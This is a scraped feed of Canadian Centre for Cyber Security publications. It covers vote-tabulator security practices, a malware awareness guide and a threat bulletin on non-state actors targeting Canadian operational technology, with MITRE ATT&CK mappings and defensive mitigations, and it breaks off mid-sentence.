monitoring</h3> <p>Enable event and log collection capabilities on the vote tabulator to assist with incident investigations. Activity events should be logged in protected storage, like write-once media, and retention of log data should adhere to legal and privacy regulations. Make sure to coordinate logging activities with incident response and forensic objectives to ensure that the activity logs collected contain the information needed to investigate incidents.</p> <h3 id="5.11">Business continuity</h3> <p>You should establish and test business continuity plans and procedures to ensure your election activities can recover from adverse events. Business planning should identify which data must be backed up and establish testing and recovery procedures for your back-ups. In addition, you should consider which combination of onsite or offsite back-up options best meet your needs. Back-ups require the same security protections as actual devices, including physical security, network isolation, controlled access, and two-person-control.</p> <p>For more information on business continuity planning, read <a href="/en/guidance/developing-your-business-continuity-plan-itsap10005">Developing your business continuity plan (ITSAP.10.005).</a> For more information on back-ups, read <a href="/en/guidance/tips-backing-your-information-itsap40002">Tips for backing up your information (ITSAP.40.002)</a>.</p> <p>For live elections, ensure you have contingency procedures and can quickly recover from unplanned events such as vote tabulator failures or theft. You should secure access to and encrypt sensitive data back-ups. You should also back up encryption keys, security certificates and credentials to facilitate recovery when required and disconnect external storage when not in use to minimize the likelihood that back-up data will be corrupted.</p> <h4>Retain paper backups</h4> <p>When designing elections processes that use vote tabulators, it is important that administrators consider resilient solutions to protect against disruption attacks and electronic manipulation. While keeping electronic data back-ups is a critical step in enabling quick recovery from unplanned incidents, paper records or copies of voter ballots and tabulated results should be maintained. If a catastrophic incident impacts the functioning of electoral systems, paper records will ensure the democratic process can proceed.</p> <h4>Plan for incidents and recovery</h4> <p>Security incidents may still occur even if you implement the best cyber security. Elections administrators should be prepared to deal with and recover from cyber security compromises. Have an incident recovery plan in place which outlines roles and responsibilities of all stakeholders. Test your plan regularly to assure its effectiveness. Electoral processes that rely on electronic systems should have manual and off-the-grid back-up measures that can be deployed should electronic systems fail.</p> <p>For more information on incident response and recovery planning, read <a href="/en/guidance/developing-your-incident-response-plan-itsap40003">Developing your incident response plan (ITSAP.40.003)</a> and <a href="/en/guidance/developing-your-it-recovery-plan-itsap40004">Developing your <abbr title="information technology">IT</abbr> recovery plan (ITSAP.40.002)</a>.</p> <h3 id="5.12">Educate users</h3> <p>Educating elections staff and volunteers about cyber security risks is critical for maintaining the safe operation of vote tabulators. Frontline elections staff and volunteers should be trained on how their actions could help facilitate or thwart a cyber security attack. Ensure elections staff receive regular training to understand the threat environment. Training and awareness programs should target all users of electoral systems. You should also periodically evaluate the effectiveness of your training programs and ensure the content is aligned with threat assessment feedback and addresses key threat issues.</p> <p>For more information on tailored cyber security training, read <a href="https://www.cyber.gc.ca/en/guidance/top-10-it-security-actions-6-provide-tailored-cyber-security-training-itsm10093">Top 10 <abbr title="information technology">IT</abbr> security actions: No. 6 Provide tailored cyber security training (ITSM.10.093)</a>.</p> <h4>Personnel security</h4> <p>An effective security screening process for your staff and volunteers is crucial. Implement a personnel and volunteer screening process to ascertain and validate the integrity of people recruited to work as poll staff or elections officials. Conduct security background checks before employees and volunteers are hired. Ensure the screening process continuously assesses the suitability of employees or volunteers even as they change roles or positions.</p> <p>To limit the possibility of foreign legal compulsion, only Canadian citizens with the appropriate security clearance should be granted administrative access to the vote tabulation system during any phase of its system lifecycle.</p> <h3 id="5.13">Security control effectiveness</h3> <p>Assessing and testing the effectiveness of security controls deployed on vote tabulators is an important step in ensuring systems are functioning as expected and will be resilient against real-world attacks. Elections administrators can leverage controlled testing strategies such as procedural or physical penetration testing and threat modelling techniques. In addition, the following are some other measures that can help ensure that security controls remain effective:</p> <ul><li>Automating assessment measures to continuously validate that operational, technical, and management control measures are functioning as expected</li> <li>Identifying relevant security, operational and performance metrics that should be evaluated</li> <li>Assessing the cyber resiliency capabilities of the system to withstand disruptive events such as a logic bomb</li> </ul><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <h2 id="6">Conclusion</h2> <p>Vote tabulation devices provide electronic capabilities that can enable and enhance the democratic process and increase efficiency. However, potential threats to vote tabulators, such as disruptions or altered data, can negatively impact trust in the democratic process. The applications and deployment architecture of these systems must therefore be carefully considered. To lessen the impact of potential attacks when deploying and using vote tabulators, elections management bodies should adopt a rigorous focus on security, including appropriate control protections.</p> <p>Elections administrators must adopt a data-centric strategy which implements security controls across the data path to secure voting systems. They should ensure that vote tabulators used during democratic elections are validated and that appropriate security protections are in place. Elections administrators should further ensure that the integrity of software, firmware, and hardware deployed in tabulation devices is validated, and should continuously protect these devices and systems throughout their entire lifecycle.</p> <hr /><h2>Effective date</h2> <p>This publication takes effect on August 6, 2026.</p> <p>This is an <span class="text-uppercase">UNCLASSIFIED</span> publication that has been issued under the authority of the Head of the Canadian Centre for Cyber Security (Cyber Centre). For more information, contact the Cyber Centre:</p> <ul><li>by email: <a href="mailto:contact@cyber.gc.ca">contact@cyber.gc.ca</a></li> <li>by phone: <a href="tel:+1-613-949-7048">613-949-7048</a>or <a href="tel:+1-833-292-3788">1-833-CYBER-88</a></li> </ul></div> </div> </div> </div> </div> </article>

  • How the Canadian Centre for Cyber Security used frontier AI to accelerate detection engineering
    by Canadian Centre for Cyber Security on August 5, 2026 at 1:04 pm

    Discover how CSE’s Frontier AI Lab is exploring the ways artificial intelligence can strengthen cyber defence, beginning with detection engineering.

  • Protect your organization from malware – ITSAP.00.057
    by Canadian Centre for Cyber Security on August 4, 2026 at 7:05 pm

    <article data-history-node-id="705" about="/en/guidance/protect-your-organization-malware-itsap00057" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><div class="row "> <div class="col-md-4 pull-left hidden-xs hidden-sm"> <p class="text-left"><strong>August 2026</strong></p> </div> <div class="col-md-4 hidden-xs hidden-sm"> <p class="text-center"><strong>Awareness series</strong></p> </div> <div class="col-md-4 pull-right hidden-xs hidden-sm"> <p class="text-right"><strong>ITSAP.00.057</strong></p> </div> <!–MOBILE STARTS HERE–> <div class="hidden-lg hidden-md text-center"> <p><strong>August 2026 | Awareness series</strong></p> </div> </div> <div class="clearfix"> </div> <p>Malware, also known as malicious software, is used by threat actors to compromise networks, systems and devices. When malware infects an organization, threat actors may be able to gain access to sensitive information, monitor activity and disrupt operations.</p> <p>This publication outlines common types of malware, the warning signs of an infected device and the steps to take when a device is compromised. It also provides practical tips to help protect your organization from future threats.</p> <section><h2>On this page</h2> <ul><li><a href="#1">How malware is introduced</a></li> <li><a href="#2">Malware types and behaviour</a></li> <li><a href="#3">How artificial intelligence is transforming malware</a></li> <li><a href="#4">Signs of an infected device</a></li> <li><a href="#5">Steps to address infected devices</a></li> <li><a href="#6">Tips to protect against malware</a></li> <li><a href="#7">Learn more</a></li> </ul></section><h2 id="1">How malware is introduced</h2> <p>Malware can enter a network, system or device through vulnerabilities or risky actions. The following examples highlight common ways in which users might inadvertently introduce malware into systems and devices.</p> <h3>Downloads and files</h3> <ul><li>Opening malicious email attachments</li> <li>Downloading software, apps or updates from untrusted sources</li> <li>Downloading or sharing files through peer-to-peer or unofficial file-sharing platforms</li> <li>Connecting unverified or unscanned removable media (for example, USBs or external drives)</li> </ul><h3>Browsing and access</h3> <ul><li>Clicking deceptive pop-ups, ads or fake warnings</li> <li>Installing unauthorized browser extensions or toolbars</li> <li>Visiting unsafe or compromised websites</li> <li>Using unsecured or untrusted Wi-Fi networks</li> </ul><h3>Device and account security</h3> <ul><li>Using outdated, unsupported or unpatched software or devices</li> <li>Using weak, default or reused passwords</li> </ul><h2 id="2">Malware types and behaviour</h2> <p>Malware appears in many forms, each designed to exploit systems in different ways. Understanding the different types of malware can help you detect malicious activity early and respond with confidence. Malware can be described by how it spreads and what it does once it is running. A single attack may involve more than one method and more than one capability.</p> <h3>How malware spreads</h3> <p>Malware can spread through different techniques that allow it to install itself and move between systems or networks. The types below describe how malware gains access and propagates.</p> <ul><li><strong>Trojan horse:</strong> disguises itself as harmless software to persuade users to install it, enabling unauthorized access or harmful actions</li> <li><strong>Virus:</strong> infects files and spreads to other systems through user actions, such as opening or sharing infected files</li> <li><strong>Worm:</strong> executes independently and self-replicates, usually through network connections, to cause damage such as deleting files, sending unauthorized emails or taking up bandwidth</li> </ul><h3>What malware can do</h3> <p>Once malware is running, it may perform a range of harmful actions that affect systems, data or users. The malware types below describe the impact or effects of malware on infected devices.</p> <ul><li><strong>Adware:</strong> tracks Internet activity to deliver targeted pop-up advertisements <ul><li>it is often installed without user consent through bundled software or malicious websites</li> <li>it may redirect browsing traffic or collect user data</li> </ul></li> <li><strong>Browser hijacker:</strong> manipulates browser settings to redirect users to unwanted websites or ads, often changing the homepage, modifying search defaults or adding unauthorized toolbars</li> <li><strong>Botnet:</strong> connects a network of infected devices (called "bots" or "zombies")</li> <li><strong>Cryptojacking:</strong> hijacks a device’s processing power to mine cryptocurrency without the owner’s knowledge, often causing significant slowdowns and overheating</li> <li><strong>Logic bomb:</strong> triggers malicious actions on a system when specific conditions are met, such as a particular date, time or user action, and often remains hidden until activated</li> <li><strong>Rootkit:</strong> grants hidden access to networks, systems or devices by masking itself as a legitimate operating system (OS) component. <ul><li>it frequently embeds itself deep within OS components or firmware to avoid detection</li> </ul></li> <li><strong>Ransomware:</strong> denies access to data or systems, typically by encrypting data and withholding the decryption keys until payment is made to the threat actor</li> <li><strong>Spyware:</strong> designed to monitor user activity and collect sensitive information, including browsing data, login details or personal information. Common types of spyware include: <ul><li><strong>information stealers:</strong> extract sensitive data from a device, including user credentials, browser history, browser session cookies and tokens, autofill information such as saved payment card details, communication logs, documents, system information, and even screenshots</li> <li><strong>keyloggers:</strong> capture and record keystrokes so threat actors can obtain sensitive information such as passwords, personal data or financial information <ul><li>they often operate within the OS or within keyboard input software to collect this information discreetly</li> </ul></li> </ul></li> <li><strong><abbr title="virtual private network">VPN</abbr>filter: </strong>compromises routers to allow threat actors to intercept traffic, harvest information, exploit connected systems and disrupt or manipulate network traffic</li> <li><strong>Wiper:</strong> destroys data by permanently erasing, overwriting or corrupting files and system components, often rendering devices inoperable and leaving little or no chance of recovery</li> </ul><h2 id="3">How artificial intelligence is transforming malware</h2> <p>Threat actors are taking advantage of artificial intelligence (AI) to make common types of malware more effective. The following sections outline the three ways <abbr title="artificial intelligence">AI</abbr> is transforming malware.</p> <h3>Method 1: <abbr title="artificial intelligence">AI</abbr>-assisted malware</h3> <p>This form of malware relies on <abbr title="artificial intelligence">AI</abbr> tools that operate outside the malware itself to assist in how attacks are developed or delivered. This can make malicious activity faster, more targeted and more convincing.</p> <p>For example, threat actors may use <abbr title="artificial intelligence">AI</abbr> to generate messages, craft malicious code, automated scanning of public information to identify valuable targets and craft tailored social engineering content designed to increase infection rates.</p> <p>Entry points include phishing emails with malicious links or attachments, downloads from compromised websites and the use of stolen or weak credentials to log into systems.</p> <h3>Method 2: <abbr title="artificial intelligence">AI</abbr>-augmented malware</h3> <p>This form of malware uses <abbr title="artificial intelligence">AI</abbr> to strengthen traditional malicious functions during execution to enhance stealth, speed or decision making. <abbr title="artificial intelligence">AI</abbr> enhances these actions but does not completely control or replace the underlying malware processes.</p> <p>For example, threat actors may use <abbr title="artificial intelligence">AI</abbr> to choose less visible routes for lateral movement, shape data exfiltration to resemble routine traffic, prioritize targets based on observed activity or automatically fine-tune tactics to avoid malware detection tools.</p> <p>Entry points include phishing emails with malicious links or attachments, exploitation of unpatched systems and misuse of remote access, which the malware then builds on using <abbr title="artificial intelligence">AI</abbr> to improve how it spreads or hides.</p> <h3>Method 3: Embedded <abbr title="artificial intelligence">AI</abbr> malware</h3> <p>This form of malware is designed with <abbr title="artificial intelligence">AI</abbr> embedded into the payload so it can analyze the system it infects and adjust its behaviour in real time. This allows it to identify targets, respond to security controls and choose actions that maximize its effectiveness.</p> <p>For example, <abbr title="artificial intelligence">AI</abbr> may be used to select high-value files to steal, alter activity when security tools are detected, adjust execution timing based on user behaviour or learn from system conditions to refine future actions (for example, self-modifying code).</p> <p>Entry points include phishing emails with malicious links or attachments and vulnerable or misconfigured Internet-facing services that allow threat actors to place the malware on a device or system.</p> <h2 id="4">Signs of an infected device</h2> <p>Malware often disrupts devices in subtle ways before the damage becomes obvious. Staying aware of the following indicators can help you identify potential threats early and protect your information effectively.</p> <h3>Changes on your device</h3> <ul><li>Pop-up windows appearing on your device</li> <li>Homepage changes</li> <li>Browser redirects, new or unknown toolbars or unexpected icons</li> </ul><h3>Performance issues</h3> <ul><li>Slow computer performance</li> <li>Page or system crashes</li> <li>Unusual or excessive hard drive activity, especially when the system is idle</li> </ul><h3>Security or software changes</h3> <ul><li>Unknown programs running on your device</li> <li>Antivirus or malware protection software being disabled</li> <li>Security settings or administrative controls being locked or altered</li> <li>Files becoming inaccessible, encrypted or renamed</li> <li>Ransom notes or payment demands appearing on the device</li> </ul><h3>Unusual account activity</h3> <ul><li>Spam emails or messages sent from your account</li> <li>Unauthorized password changes or unusual login activity</li> </ul><h3>Network and device behaviour</h3> <ul><li>High network traffic when the device is idle</li> <li>Overheating, rapid battery drain or unusual data use on your mobile device</li> </ul><h2 id="5">Steps to address infected devices</h2> <p>When a device becomes infected with malware, quick action is essential to limit damage, prevent further spread and protect sensitive information. The following steps outline current best practices to help you contain the threat, clean your device safely and restore it to a secure state.</p> <h3>Immediate actions</h3> <ul><li>Contact your information technology (IT) security service desk or <abbr title="information technology">IT</abbr> provider immediately</li> <li>Disconnect the infected device from all networks (for example, Wi-Fi, Ethernet, and mobile data)</li> <li>If malware appears to be active or spreading, power off the device to prevent further damage</li> <li>Refrain from using the infected device to sign into sensitive accounts, such as email, financial systems or administrative portals</li> </ul><h3>Containment and recovery</h3> <ul><li>Run antivirus scans offline when possible</li> <li>Restore data only from known, clean backups that were created before the infection</li> <li>Scan all backup files before restoring them to ensure they are free of malware <ul><li>Use trusted malware analysis tools, such as <a href="/en/tools-services/assemblyline">Assemblyline</a>, the Canadian Centre for Cyber Security’s malware detection and analysis platform, to help assess suspicious files before restoration</li> </ul></li> <li>Reset all passwords associated with the device, revoke active sign-in sessions and access tokens and re-enrol multi-factor authentication (MFA) to prevent misuse of stolen credentials</li> </ul><h3>Post-incident monitoring</h3> <ul><li>Reconnect the device to your network only after the <abbr title="operating system">OS</abbr> is reinstalled and all malware scans confirm the device is clean</li> <li>Continue monitoring the device for unusual behaviour, suspicious traffic or new alerts</li> <li>Perform regular antivirus scans to ensure no malware remains</li> </ul><h2 id="6">Tips to protect against malware</h2> <p>Staying safe online requires more than just good habits; it requires intentional and proactive cyber hygiene. Malware threats continue to evolve, targeting personal devices, corporate systems and everything in between. By following best practices such as our <a href="/en/guidance/top-10-it-security-actions">Top 10 <abbr title="information technology">IT</abbr> security actions</a> and using trusted protective tools, you can significantly reduce your risk of compromise. The following tips outline the most effective steps you can take to strengthen your defences and help keep your information, devices and accounts secure.</p> <h3>Authentication and identity security</h3> <ul><li>Enable passkeys or phishing-resistant MFA for all accounts, choosing authentication methods that align with the sensitivity of the account and the level of risk</li> <li>Use a password manager to generate and store long, unique passwords</li> <li>Limit user and administrator access to only what is required for their roles and regularly remove excess permissions</li> </ul><h3>Device and system hardening</h3> <ul><li>Install software, <abbr title="operating system">OS</abbr> and firmware updates immediately</li> <li>Use anti-virus, anti-malware and endpoint detection and response tools</li> <li>Use a firewall to block and restrict unauthorized network access</li> <li>Enable full-disk or file-based encryption</li> <li>Use host intrusion detection systems where supported</li> <li>Use application allowlisting so only authorized apps can run</li> <li>Turn off wireless features like Wi-Fi, Bluetooth, GPS and near-field communication when not in use</li> </ul><h3>Network and Internet safety</h3> <ul><li>Avoid public Wi-Fi or use a virtual private network when public Wi-Fi is necessary</li> <li>Use anti-phishing protections and align email systems with Domain-based Message Authentication, Reporting, and Conformance (DMARC)</li> <li>Use an ad blocker to reduce risk from malicious ads or a tracker blocker and limit the collection of browsing activity information</li> <li>Verify files, links and attachments before downloading or opening them</li> <li>Provide regular security awareness training so users can recognize phishing emails, malicious links, fake websites and social engineering attempts</li> <li>Encourage users to report suspected phishing or malware quickly to reduce spread and impact</li> <li>Use a protective domain name system to prevent access to malicious or suspicious domains</li> <li>Monitor device data usage for suspicious or unusual activity</li> </ul><h3>Backup and data protection</h3> <ul><li>Follow the 3-2-1 backup rule: 3 copies, 2 types of media, 1 offsite</li> <li>Encrypt sensitive data stored in backups</li> </ul><h3>Zero-trust and enterprise controls</h3> <ul><li>Implement zero-trust architecture</li> <li>Use identity threat detection and response tools</li> <li>Strengthen supply chain security and monitor third-party risks</li> </ul><h2 id="7">Learn more</h2> <ul><li><a href="/en/guidance/ransomware-playbook-itsm00099">Ransomware playbook (ITSM.00.099)</a></li> <li><a href="/en/guidance/spotting-malicious-email-messages-itsap00100">Spotting malicious email messages (ITSAP.00.100)</a></li> <li><a href="/en/guidance/how-updates-secure-your-device-itsap10096">How updates secure your device (ITSAP.10.096)</a></li> <li><a href="/en/guidance/best-practices-passphrases-and-passwords-itsap30032">Best practices for passphrases and passwords (ITSAP.30.032)</a></li> <li><a href="/en/guidance/password-managers-security-itsap30025">Password managers: Security tips (ITSAP.30.025)</a></li> <li><a href="/en/guidance/protective-domain-name-system-itsap40019">Protective Domain Name System (ITSAP.40.019)</a></li> <li><a href="/en/guidance/preventative-security-tools-itsap00058">Preventative security tools (ITSAP.00.058)</a></li> <li><a href="/en/guidance/dont-take-bait-recognize-and-avoid-phishing-attacks">Don’t take the bait: Recognize and avoid phishing attacks (ITSAP.00.101)</a></li> </ul></div> </div> </div> </div> </div> </article>

  • Cyber threat bulletin: Non-state activity targeting Canadian operational technology
    by Canadian Centre for Cyber Security on July 30, 2026 at 3:02 pm

    <article data-history-node-id="8047" about="/en/guidance/cyber-threat-bulletin-non-state-activity-targeting-canadian-operational-technology" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><p>The Canadian Centre for Cyber Security (Cyber Centre) has continued to observe non-state cyber threat actors targeting and attempting to disrupt vulnerable, internet-exposed operational technology (OT) systems in Canada. Non-state actors often use cyber threat activity to intimidate or coerce their targets, either to influence public opinion or government decision making related to international events.</p> <p>We assess that non-state activity against Canada very likely increases around events like public statements or policy announcements by Canada that these actors perceive as being counter to their ideological goals, and around other high-profile events, for example diplomatic summits or major international sporting events, that amplify the visibility and impact of their activity. However, we assess that some non-state actors likely continuously scan for vulnerable systems in Canada and may conduct disruptive or destructive cyber threat activity at any time.</p> <p>Although some non-state actors appear to receive support from state actors, we assess that most non-state cyber threat activity against Canadian <abbr title="operational technology">OT</abbr> systems is almost certainly independently planned and executed. Relationships between state and non-state actors are frequently ad hoc, and the degree of connection can vary over time. As such, state-aligned non-state activity should not necessarily be interpreted as representing state interests or policy toward Canada.</p> <h2>Tactics, techniques, and procedures</h2> <p>A growing number of non-state actors are targeting internet-connected <abbr title="operational technology">OT</abbr> systems intending to cause disruptive or destructive effects. These actors generally demonstrate low to moderate technical sophistication but are effective due to poor exposure hygiene and insecure remote access in <abbr title="operational technology">OT</abbr> environments.</p> <p>In October 2025 alone, there were several incidents of non-state actors affecting <abbr title="operational technology">OT</abbr> systems in Canada including:</p> <ul><li>A pro-Russia non-state actor compromised a municipal water system and successfully manipulated water pressure valve controls, causing minor impacts to water service delivery.</li> <li>A pro-Hamas non-state actor gained access to a fuel tank gauging system located at an airport. The actor was able to view system information but did not gain the ability to manipulate system controls.</li> <li>A pro-Russia non-state actor gained access to a grain drying silo’s control system. The actor manipulated temperature and humidity levels within the silo, but there was no evidence that damage was caused.</li> </ul><p>This activity frequently uses publicly available scanning tools to identify internet-connected <abbr title="operational technology">OT</abbr> and exploits outdated or insecurely configured remote access tools like virtual network computing (VNC), weak or default passwords, or systems that do not use multi-factor authentication.</p> <p>After gaining access to these systems, non-state actors attempt to disrupt them by defacing system interfaces, changing configurations, and manipulating system controls. This can lead to operational disruptions, systems operating in unintended ways, and potentially physical damage to the systems. In some cases, this activity may create dangerous conditions that implicate operator or public safety.</p> <h3>Non-state actor <abbr title="operational technology">OT</abbr> <abbr title="tactics, techniques, and procedures">TTPs</abbr> mapped to <span class="text-uppercase">MITRE ATT&amp;CK</span> for <abbr title="industrial control systems">ICS</abbr></h3> <dl class="dl-horizontal"><dt>T0888 – Remote System Discovery</dt> <dd>Internet wide scanning for exposed <abbr title="operational technology">OT</abbr> systems and remote access services</dd> <dt>T0866 – Valid Accounts</dt> <dd>Exploitation of internet accessible remote access services using weak, default, or reused credentials (e.g., <abbr title="virtual network computing">VNC</abbr>, remote desktop, vendor maintenance portals)</dd> <dt>T0886 – Remote Services</dt> <dd>Use of legitimate remote services to access <abbr title="operational technology">OT</abbr> environments</dd> <dt>T0856 – Control Device Identification</dt> <dd>Direct interaction with human machine interfaces (HMIs), engineering workstations, or control system interfaces</dd> <dt>T0831 – Manipulation of Control<br /> T0809 – Modify Controller Tasking</dt> <dd>Manipulation of <abbr title="operational technology">OT</abbr> system configurations and setpoints (e.g., pressure, temperature, alarms)</dd> </dl><h2>Outlook</h2> <p>The cyber threat picture facing <abbr title="information technology">OT</abbr> and <abbr title="operational technology">OT</abbr> asset operators is deteriorating. Although Canada has avoided a high-impact <abbr title="operational technology">OT</abbr> incident to date, the expanding threat surface associated with vulnerable <abbr title="operational technology">OT</abbr> deployments and the increase in threat actor capability and intent against those systems increases the likelihood that future incidents will be more severe.</p> <p>Cyber threat actors continue to adapt their activities in response to geopolitical events, technological developments, and mitigation efforts by defenders. Artificial intelligence (AI) tools capable of supporting cyber threat activity are rapidly improving and becoming increasingly available. These tools allow even low sophistication cyber threat actors to conduct more complex and disruptive attacks against <abbr title="operational technology">OT</abbr> systems.</p> <p>The cyber threat identified in this advisory can largely be mitigated through awareness and by applying cyber security best practices. The Cyber Centre encourages <abbr title="information technology">OT</abbr> and <abbr title="operational technology">OT</abbr> system owners to implement the recommended mitigation advice below.</p> <h2>Mitigations</h2> <p>The Cyber Centre recommends that critical infrastructure organizations implement the following mitigations to help establish robust cyber defences against non-state cyber threat actors. Each of the mitigations below are linked to the Cyber Centre’s <a href="/en/cyber-security-readiness/cyber-security-readiness-goals-securing-our-most-critical-systems">Cyber Security Readiness Goals (CRGs)</a>, which are baseline practices for organizations to bolster their cyber security posture. Further details of each goal can be found in the <a href="/en/cyber-security-readiness/cross-sector-cyber-security-readiness-goals-toolkit">Cross-Sector Cyber Security Readiness Goals Toolkit</a>.</p> <h3>Primary mitigation</h3> <p>The most effective defence against this threat is the removal of <abbr title="operational technology">OT</abbr> systems from direct internet exposure and the establishment of a strictly controlled, monitored boundary between <abbr title="information technology">OT</abbr> and <abbr title="operational technology">OT</abbr> networks. Many of the additional controls below are compensating measures and are insufficient on their own if <abbr title="operational technology">OT</abbr> systems remain internet‑accessible.</p> <h3>Establish and protect the <abbr title="operational technology">OT</abbr> boundary and isolate administrative access</h3> <p><strong>Network segmentation (CRG 2.5)</strong></p> <ul><li>This will reduce the likelihood that threat actors will access the <abbr title="operational technology">OT</abbr> network after compromising the <abbr title="information technology">OT</abbr> network.</li> <li>All connections to the <abbr title="operational technology">OT</abbr> network are denied by default unless explicitly allowed (for example, by <abbr title="internet protocol">IP</abbr> address and port) for specific system functionality. Necessary communications paths between the <abbr title="information technology">OT</abbr> and <abbr title="operational technology">OT</abbr> networks must pass through an intermediary, such as a properly configured firewall, bastion host, jump box, or a demilitarized zone, which is closely monitored, captures network logs, and only allows connections from approved assets. <ul><li>Note that segmentation could break or disrupt processes and services as legacy <abbr title="operational technology">OT</abbr> environments are often flat. Segmentation should be done when possible, and under controlled processes.</li> </ul></li> </ul><p><strong>Prohibit connection of unauthorized devices (CRG 2.17)</strong></p> <ul><li>Maintain policies and processes to ensure that unauthorized media and hardware are not connected to <abbr title="operational technology">OT</abbr> assets, such as by limiting use of USB devices and removable media or disabling AutoRun.</li> <li>Establish procedures to remove, disable, or otherwise secure physical ports in <abbr title="operational technology">OT</abbr> environments to prevent the connection of unauthorized devices, or establish procedures for granting access through approved exceptions.</li> </ul><p><strong>Limit <abbr title="operational technology">OT</abbr> connections to public internet (CRG 2.18)</strong></p> <ul><li>Ensure no <abbr title="operational technology">OT</abbr> assets are on the public internet, unless explicitly required for operation.</li> <li>Require that exceptions be justified and documented and that excepted assets have additional protections in place to prevent and detect exploitation attempts. For example, logging, multi-factor authentication (MFA), mandatory access via proxy or another intermediary.</li> </ul><p><strong>No exploitable services on the internet (CRG 2.20)</strong></p> <ul><li>Ensure assets on the public internet do not expose any exploitable services, such as remote desktop protocol. Where these services must be exposed, implement appropriate compensating controls to prevent common forms of abuse and exploitation. Disable all unnecessary <abbr title="operating system">OS</abbr> applications and network protocols on internet-facing assets.</li> </ul><p><strong>Secure administrator workstation (SAW) (CRG 2.21)</strong></p> <ul><li>Provide administrators with <abbr title="secure administrator workstations">SAWs</abbr> to perform their administrative tasks. Create secure and hardened <abbr title="secure administrator workstations">SAWs</abbr> by implementing the following: <ul><li>Isolate <abbr title="secure administrator workstations">SAWs</abbr> from the public <abbr title="information technology">OT</abbr> network, and when present, from the data plane.</li> <li>Deactivate capability to install other software.</li> <li>Restrict access to the internet or email services.</li> <li>For cloud administration from this dedicated workstation, ensure it requires a <abbr title="virtual private network">VPN</abbr> or allow lists to access the cloud tenancy.</li> </ul></li> </ul><h3>Use strong access controls</h3> <p><strong>Changing default password (CRG 2.0)</strong></p> <ul><li>Enforce an organization-wide policy or process that requires changing default manufacturer passwords for all hardware, software, and firmware before putting them on any internal or external networks. This includes <abbr title="information technology">OT</abbr> assets for <abbr title="operational technology">OT</abbr>, such as <abbr title="operational technology">OT</abbr> administration web pages. This should be done in consultation with vendor advice and guidance or following an approved vendor process.</li> <li>Enforce a policy to change default credentials for all new or future devices. This reduces potential risk in the future if adversary <abbr title="tactics, techniques, and procedures">TTPs</abbr> change and requires significantly less work than changing default passwords on an organization’s existing <abbr title="operational technology">OT</abbr>.</li> </ul><p><strong>Minimum password length (CRG 2.1)</strong></p> <ul><li>Implement a system-enforced policy that requires a minimum password length of 15 or more characters for all password-protected <abbr title="operational technology">OT</abbr> assets where technically feasible.</li> <li>OT assets that use a central authentication mechanism (such as Active Directory) are most important to address. Examples of low-risk <abbr title="operational technology">OT</abbr> assets that may not be technically feasible include those in remote locations, such as on offshore rigs or wind turbines.</li> </ul><p><strong>Unique credentials (CRG 2.2)</strong></p> <ul><li>Provision unique and separate credentials for similar services and asset access on <abbr title="operational technology">OT</abbr> networks.</li> <li>Ensure users do not and cannot reuse passwords for accounts, applications, services, etc.</li> <li>Require that service accounts/machine accounts have unique passwords from all member user accounts.</li> </ul><p><strong>Separating user and privileged accounts (CRG 2.4)</strong></p> <ul><li>User accounts do not always have administrator or super-user privileges. Administrators should maintain separate user accounts for all actions and activities not associated with the administrator role (for example, for business email, web browsing).</li> <li>Reevaluate privileges on a recurring basis to validate continued need for given permissions.</li> </ul><p><strong>Phishing-resistant multi-factor authentication (MFA) (CRG 2.7)</strong></p> <ul><li>Within <abbr title="operational technology">OT</abbr> environments, enable <abbr title="multi-factor authentication">MFA</abbr> on all accounts and systems that can be accessed remotely, including vendors/maintenance accounts, remotely accessible user and engineering workstations, and remotely accessible human-machine interfaces.</li> </ul><h3>Understand and reduce exposure</h3> <p><strong>Asset inventory and network topology (CRG 1.0)</strong></p> <ul><li>Maintain a regularly updated inventory of all assets within the organization’s <abbr title="information technology">OT</abbr> (including IPv6) and <abbr title="operational technology">OT</abbr> networks (if applicable).</li> <li>Include in the inventory accurate documentation of network topology and identified data assets, in particular sensitive or classified information.</li> <li>Update this inventory on a regular basis for both <abbr title="information technology">OT</abbr> and <abbr title="operational technology">OT</abbr> and immediately log in the existing inventory any new asset that is integrated into the organization’s infrastructure.</li> </ul><p><strong>Mitigate known vulnerabilities (CRG 1.1)</strong></p> <ul><li>Patch all known exploited vulnerabilities (listed in <abbr title="Cybersecurity &amp; Infrastructure Security Agency">CISA</abbr> ‘s Known Exploited Vulnerabilities Catalog) in internet-facing systems within a risk-informed timespan, prioritizing more critical assets first. Identify security vulnerabilities in your systems by conducting penetration tests and using automated vulnerability scanning tools, activities which are part of a comprehensive vulnerability management strategy.</li> <li>For assets where patching is not possible or may substantially compromise availability or safety, apply and record compensating controls (e.g., segmentation, monitoring). Sufficient controls either make the asset inaccessible from the public internet or reduce the ability of threat actors to exploit the vulnerabilities in these assets.</li> <li>Carefully select automated vulnerability detection tools as they can scan systems aggressively. These tools may cause devices to behave erratically, stop working/crash, or restart, or need manual intervention to revert to an operational state.</li> </ul><h3>Improve detection and response</h3> <p><strong>Detection of unsuccessful (automated) login attempts (CRG 2.6)</strong></p> <ul><li>Log all unsuccessful logins and send to an organization’s security team or relevant logging system.</li> <li>Ensure security teams are notified (e.g., by an alert) after a specific number of consecutive, unsuccessful login attempts in a short period (e.g., 5 failed attempts over 2 minutes). Log and store these alerts in the relevant security or ticketing system for retroactive analysis.</li> <li>For <abbr title="information technology">OT</abbr> assets, implement a system-enforced policy that prevents future logins for the suspicious account. For example, this could be for some minimum time or until the account is re-enabled by a privileged user. Enable this configuration when available on an asset. For example, 